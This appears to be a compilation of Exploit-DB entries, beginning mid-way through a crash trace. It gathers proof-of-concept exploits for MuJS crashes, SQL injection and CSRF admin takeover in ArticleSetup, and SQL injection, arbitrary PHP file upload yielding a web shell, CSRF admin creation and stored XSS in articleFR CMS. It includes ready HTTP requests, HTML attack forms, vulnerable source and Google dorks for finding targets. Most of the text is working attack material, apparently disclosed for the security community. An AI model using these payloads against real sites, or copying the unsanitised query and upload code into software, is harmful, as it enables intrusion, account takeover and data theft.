SUMMARY: AddressSanitizer: SEGV XYZ/mupdf/source/fitz/draw-paint.c:1948:2 in fz_paint_pixmap_with_mask
==1406==ABORTING
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42138.zip
# Exploit Title: DoS caused by the interactive call between two functions
# Date: 2018-01-16
# Exploit Author: Andrea Sindoni - @invictus1306
# Vendor: Artifex (https://www.artifex.com/)
# Software Link: https://github.com/ccxvii/mujs
# Version: Mujs - 228719d087aa5e27dcd8627c4acf7273476bdbca
# Tested on: Linux
# CVE : CVE-2018-5759
Simple poc:
# python -c "print 'func%d'*80000" > poc.js
# mujs poc.js
Fixed in commit 4d45a96e57fbabf00a7378b337d0ddcace6f38c1 (
http://git.ghostscript.com/?p=mujs.git;a=commit;h=4d45a96e57fbabf00a7378b337d0ddcace6f38c1
)
Hello,
I want to submit the following bug:
The js_strtod function in jsdtoa.c in Artifex MuJS through 1.0.2 has an
integer overflow because of incorrect exponent validation.
# Exploit Title: Integer signedness error leading to Out-of-bounds read
that causes crash
# Date: 2018-01-24
# Exploit Author: Andrea Sindoni - @invictus1306
# Vendor: Artifex (https://www.artifex.com/)
# Software Link: https://github.com/ccxvii/mujs
# Version: Mujs - 228719d087aa5e27dcd8627c4acf7273476bdbca
# Tested on: Linux
# CVE : CVE-2018-6191
Content of the poc file
$ cat poc.js
function pipo() {var 2e2147483648= 117486231123842366;}
Run it
$ mujs poc.js
Additional details about the bug:
Inside the function js_strtod, after this line
https://github.com/ccxvii/mujs/blob/81388eb40d29f10599ac30dde90e683a3c254375/jsdtoa.c#L714
exp = -exp;
the value of "exp" is still negative (cause integer declaration).
Fixed in commit 25821e6d74fab5fcc200fe5e818362e03e114428 (
http://git.ghostscript.com/?p=mujs.git;a=commit;h=25821e6d74fab5fcc200fe5e818362e03e114428
)
########################################################################################
#______________________________________________________________________________________
# Exploit Title : Article Script SQL Injection Vulnerability
# Exploit Author : Linux Zone Research Team
# Vendor Homepage: http://articlesetup.com/
# Google Dork : inurl:/article.php?id= intext:Powered By Article Marketing
# Software Link : http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Date : 15-December-2015
# Version : (Version 1.00)
# CVE : NONE
# Tested On : Linux - Chrome
# Category : Web Application
# MY HOME : http://linux-zone.org/Forums - research@linux-zone.org
#______________________________________________________________________________________
#######################################################################################
#
# localHost/article.php?id=SQL
#______________________________________________________________________________________
## Vulnerability Code
<?php
include('config.php');
//Create site settings variables
$sitequery = 'select * from settings;';
$siteresult = mysql_query($sitequery,$connection) or die(mysql_error());
$siteinfo = mysql_fetch_array($siteresult);
$siteurl = $siteinfo['url'];
$article = $_GET['id'];
if (!is_numeric($article)) {
header('Location: '.$siteurl);
}
else
{
$sitequery = 'select * from settings;';
$siteresult = mysql_query($sitequery,$connection) or die(mysql_error());
//Create site settings variables
$siteinfo = mysql_fetch_array($siteresult);
$sitetitle = $siteinfo['title'];
$siteurl = $siteinfo['url'];
$sitecomments = $siteinfo['comments'];
$commentmod = $siteinfo['commentmod'];
$query = "select * from articles where status=0 and id = ".$article;
$articleresults = mysql_query($query,$connection) or die(mysql_error());
$num_results = mysql_num_rows($articleresults);
$articleinfo = mysql_fetch_array($articleresults);
if (!$num_results) {
header('Location: '.$siteurl);
}
//Get article info
$id = $articleinfo['id'];
$authorid = $articleinfo['authorid'];
$date = strtotime($articleinfo['date']);
$artdate = date('m/d/y', $date);
$categoryid = $articleinfo['categoryid'];
$title = stripslashes($articleinfo['title']);
$body = stripslashes($articleinfo['body']);
$resource = $articleinfo['resource'];
//Meta Info
$cathead = 0;
$metatitle = $title." - ";
include('header.php');
include('sidebar.php');
if ($seourls == 1) { $scrubtitle = generate_seo_link($title); }
// Setup the article template
$articletemp = new Template("templates/".$template."/article.tpl");
// get author info
$authorquery = "select * from authors where id=".$authorid;
$authorresult = mysql_query($authorquery,$connection) or die(mysql_error());
$authorinfo = mysql_fetch_array($authorresult);
$authorname = $authorinfo['displayname'];
$authorbio = $authorinfo['bio'];
$gravatar = $authorinfo['gravatar'];
if ($seourls == 1) { $scrubauthor = generate_seo_link($authorname); }
// get category info
$catquery = "select * from categories where id=".$categoryid;
$catresult = mysql_query($catquery,$connection) or die(mysql_error());
$catinfo = mysql_fetch_array($catresult);
$categoryname = $catinfo['name'];
$catparent = $catinfo['parentid'];
if ($seourls == 1) { $scrubcatname = generate_seo_link($categoryname); }
// if the category doesn't have a parent
if ($catparent == NULL) {
if ($seourls == 1) { // With SEO URLS
$displaycat = "<a href=\"".$siteurl."/category/".$categoryid."/"
.$scrubcatname."/\"><b>".$categoryname."</b></a>";
} else {
$displaycat = "<a href=\"".$siteurl."/category.php?id=".$categoryid
."\"><b>".$categoryname."</b></a>";
}
// if the category DOES have a parent
} else {
$query = "select * from categories where id=".$catparent;
$result = mysql_query($query,$connection) or die(mysql_error());
$info = mysql_fetch_array($result);
$parentname = $info['name'];
if ($seourls == 1) { $scrubparent = generate_seo_link($parentname); }
if ($seourls == 1) { // With SEO URLS
$displaycat = "<a href=\"".$siteurl."/category/".$catparent."/"
.$scrubparent."/\"><b>".$parentname."</b></a> >
<a href=\"".$siteurl."/category/".$categoryid."/"
.$scrubcatname."/\"><b>".$categoryname."</b></a>";
} else {
$displaycat = "<a href=\"".$siteurl."/category.php?id=".$catparent
."\"><b>".$parentname."</b></a> >
<a href=\"".$siteurl."/category.php?id=".$categoryid
."\"><b>".$categoryname."</b></a>";
}
}
// Add a view to this article
$query = "select * from articleviews where articleid = ".$article;
$results = mysql_query($query,$connection) or die(mysql_error());
$viewinfo = mysql_fetch_array($results);
if ($viewinfo == NULL) {
$sql = "INSERT INTO articleviews VALUES (".$article.", 1)";
$query = mysql_query($sql);
} else {
$totalviews = $viewinfo['views'];
$totalviews++;
$sql = "UPDATE articleviews SET views=".$totalviews." WHERE `articleid`=".$article."";
$query = mysql_query($sql);
}
if ($seourls == 1) { // With SEO URLS
$authorlink = "<a href=\"".$siteurl."/profile/".$authorid."/".$scrubauthor."/\"><b>".$authorname."</b></a>";
} else {
$authorlink = "<a href=\"".$siteurl."/profile.php?a=".$authorid."\"><b>".$authorname."</b></a>";
}
// Setup all template variables for display
$articletemp->set("authorname", $authorname);
$articletemp->set("authorlink", $authorlink);
$articletemp->set("date", $artdate);
$articletemp->set("displaycat", $displaycat);
$articletemp->set("views", $totalviews);
$articletemp->set("title", $title);
$articletemp->set("body", $body);
$articletemp->set("gravatar", $gravatar);
$articletemp->set("resource", $resource);
// For the adcode
$query = "select * from adboxes where id=1;";
$result = mysql_query($query,$connection) or die(mysql_error());
$info = mysql_fetch_assoc($result);
$articletemp->set("250adcode", stripslashes($info['adcode']));
// Outputs the homepage template!
echo $articletemp->output();
//Displays the comments -- if admin has them enabled
if($sitecomments == 0) {
echo "<br/><h2>Comments</h2>";
require_once 'comments/classes/Comments.class.php';
/* Article ID which shows the comments */
$post_id = $article;
/* Level of hierarchy comments. Infinit if declared NULL */
$level = NULL;
/* Number of Supercomments (level 0) to display per page */
$supercomments_per_page = 10000;
/* Moderate comments? */
if ($commentmod == 0) {
$moderation = true;
} else {
$moderation = false;
}
# Setup db config array #
$db_config = array("db_name" => $db_name,
"db_user" => $dbusername,
"db_pass" => $dbpassword,
"db_host" => $server );
# Create Object of class comments
$comments = new Comments($post_id, $level, $supercomments_per_page, $moderation, $db_config);
# Display comments #
echo $comments->getComments();
}
include('rightsidebar.php');
include('obinclude.php');
}
?>
#######################################
#
# Hassan Shakeri - Mohammad Habili
#
# Twitter : @ShakeriHassan - Fb.com/General.BlackHat
##########################################################
<!--
# Exploit Title : ArticleSetup 1.00 - CSRF Change Admin Password
# Google Dork : inurl:/article.php?id= intext:Powered By Article Marketing
# Date: 2016/06/04
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://articlesetup.com/
# Software Link: http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Version: 1.00
#Desc:
When admin click on malicious link , attacker can login as a new
Administrator
with the credentials detailed below.
#Exploit:
-->
<html>
<body>
<form method="post" action="
http://localhost/{PACH}/admin/adminsettings.php">
<input type="hidden" name="update" value="1">
<input type="hidden" name="pass1" type="hidden" value="12345678" >
<input type="hidden" name="pass2" type="hidden" value="12345678" >
<input type="submit" value="create">
</form>
</body>
</html>
<!--
####################################
[+]Exploit by: Ali Ghanbari
[+]My Telegram :@Exploiter007
-->
# Exploit Title: SQL injection vulnerability in articleFR CMS 3.0.5
# Google Dork: N/A
# Date: 01/21/2015
# Exploit Author: Tran Dinh Tien (tien.d.tran@itas.vn) & ITAS Team (www.itas.vn)
# Vendor Homepage: http://freereprintables.com
# Software Link: https://github.com/articlefr/articleFR
# Version: version 3.0.5
# Tested on: Linux
# CVE : N/A
::PROOF OF CONCEPT::
- REQUEST:
POST /articlefr/register/ HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.org/articlefr/register/
Cookie: _ga=GA1.2.884814947.1419214773; __unam=bd22dea-14a6fcadd31-42cba495-31; GEAR=local-5422433b500446ead50002d4; PHPSESSID=8a9r8t1d5g9veogj6er9fvev63; _gat=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
username=[SQL INJECTION HERE]&email=test2%40itas.vn&name=test&password=123123&submit=register
- Vulnerable file: articleFR/system/profile.functions.php
- Vulnerable parameter: username
- Query: SELECT id, username, name, password, email, website, blog, date, isactive, activekey, membership FROM users WHERE username ='[Injection HERE]'
- Vulnerable function:
function getProfile($_username, $_connection) {
$_q = "SELECT id, username, name, password, email, website, blog, date, isactive, activekey, membership FROM users WHERE username = '" . $_username . "'";
$_result = single_resulti($_q, $_connection);
$_retval['id'] = $_result['id'];
$_retval['name'] = $_result['name'];
$_retval['username'] = $_result['username'];
$_retval['password'] = $_result['password'];
$_retval['email'] = $_result['email'];
$_retval['website'] = $_result['website'];
$_retval['blog'] = $_result['blog'];
$_retval['date'] = $_result['date'];
$_retval['isactive'] = $_result['isactive'];
$_retval['activekey'] = $_result['activekey'];
$_retval['membership'] = $_result['membership'];
return $_retval;
}
# Exploit Title: Arbitrary File Upload in articleFR CMS 3.0.5
# Google Dork: N/A
# Date: 01/21/2015
# Exploit Author: Tran Dinh Tien (tien.d.tran@itas.vn) & ITAS Team (www.itas.vn)
# Vendor Homepage: http://freereprintables.com
# Software Link: https://github.com/articlefr/articleFR
# Version: version 3.0.5
# Tested on: Linux
# CVE : N/A
::PROOF OF CONCEPT::
- REQUEST:
POST /articlefr/dashboard/videouploader.php HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://target.org/articlefr/dashboard/videos/fileupload/
Content-Length: 414
Content-Type: multipart/form-data; boundary=---------------------------277651700022570
Cookie: GEAR=local-5422433b500446ead50002d4; PHPSESSID=uc86lsmbm53d73d572tvvec3v4; _ga=GA1.2.884814947.1419214773; __unam=bd22dea-14a6fcadd31-42cba495-9; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------277651700022570
Content-Disposition: form-data; name="myVideo"; filename="img.php"
Content-Type: image/gif
<?php
phpinfo();
?>
-----------------------------277651700022570
Content-Disposition: form-data; name=""
undefined
-----------------------------277651700022570
Content-Disposition: form-data; name=""
undefined
-----------------------------277651700022570--
- RESPONSE:
HTTP/1.1 200 OK
Date: Mon, 22 Dec 2014 03:10:30 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Type: text/html
Vary: Accept-Encoding
Accept-Ranges: none
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 36
[String_Random].php
- Shell link: http://target.org/articlefr2/dashboard/videos/[String_Random].php
- Vulnerable file: articlefr/dashboard/videouploader.php
- Vulnerable code:
<?php
$output_dir = dirname(dirname(__FILE__)) . "/videos_repository/";
if(isset($_FILES["myVideo"]))
{
$ret = array();
$error =$_FILES["myVideo"]["error"];
if(!is_array($_FILES["myVideo"]["name"]))
{
$fileName = $_FILES["myVideo"]["name"];
$extension = pathinfo($fileName, PATHINFO_EXTENSION);
$newFileName = md5(uniqid() . $fileName) . '.' . $extension;
move_uploaded_file($_FILES["myVideo"]["tmp_name"], $output_dir.$newFileName);
$ret[]= $newFileName;
}
echo $newFileName;
}
?>
::REFERENCE::
- http://www.itas.vn/news/itas-team-phat-hien-lo-hong-arbitrarily-file-upload-trong-articlefr-cms-71.html
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
ArticleFR 3.0.6 CSRF Add Admin Exploit
Vendor: Free Reprintables
Product web page: http://www.freereprintables.com
Affected version: 3.0.6
Summary: A lightweight fully featured content (article / video)
management system. Comes with a pluginable and multiple module
framework system.
Desc: The application allows users to perform certain actions
via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user
visits a malicious web site.
Tested on: nginx/1.6.2
PHP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5248
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5248.php
21.06.2015
--
<html>
<body>
<form action="http://127.0.0.1/dashboard/users/create/" method="POST">
<input type="hidden" name="username" value="thricer" />
<input type="hidden" name="name" value="The_Hacker" />
<input type="hidden" name="password" value="s3cr3t" />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="hidden" name="website" value="http://www.zeroscience.mk" />
<input type="hidden" name="blog" value="zsl" />
<input type="hidden" name="membership" value="admin" />
<input type="hidden" name="isactive" value="active" />
<input type="hidden" name="submit" value="Create" />
<input type="submit" value="Request" />
</form>
</body>
</html>
##################################################################
ArticleFR 3.0.6 Multiple Script Injection Vulnerabilities
Vendor: Free Reprintables
Product web page: http://www.freereprintables.com
Affected version: 3.0.6
Summary: A lightweight fully featured content (article / video)
management system. Comes with a pluginable and multiple module
framework system.
Desc: ArticleFR suffers from multiple stored cross-site scripting
vulnerabilities. The issues are triggered when input passed via the
POST parameter 'name' in Categories, POST parameters 'title' and
'rel' in Links and GET parameter 'url' in PingServers module is
not properly sanitized before being returned to the user. This can
be exploited to execute arbitrary HTML and script code in a user's
browser session in context of an affected site.
Tested on: nginx/1.6.2
PHP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5247
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5247.php
21.06.2015
--
POST 'name' Categories Stored XSS:
----------------------------------
<html>
<body>
<form action="http://127.0.0.1/dashboard/settings/categories/" method="POST">
<input type="hidden" name="name" value='"><script>alert(1)</script>' />
<input type="hidden" name="parent" value="0" />
<input type="hidden" name="submit" value="Add" />
<input type="submit" value="XSS #1" />
</form>
</body>
</html>
POST 'title', 'rel' Links Stored XSS:
------------------------------------
<html>
<body>
<form action="http://127.0.0.1/dashboard/settings/links/" method="POST">
<input type="hidden" name="title" value='"><script>alert(2)</script>' />
<input type="hidden" name="url" value="http://www.zeroscience.mk" />
<input type="hidden" name="rel" value='"><script>alert(3)</script>' />
<input type="hidden" name="submit" value="Add" />
<input type="submit" value="XSS #2 and #3" />
</form>
</body>
</html>
POST 'url' Ping Server Reflected XSS:
-------------------------------------
<html>
<body>
<form action="http://127.0.0.1/dashboard/tools/pingservers/" method="POST">
<input type="hidden" name="url" value='http://www.zeroscience.mk"><script>alert(4)</script>' />
<input type="hidden" name="submit" value="Add" />
<input type="submit" value="XSS #4" />
</form>
</body>
</html>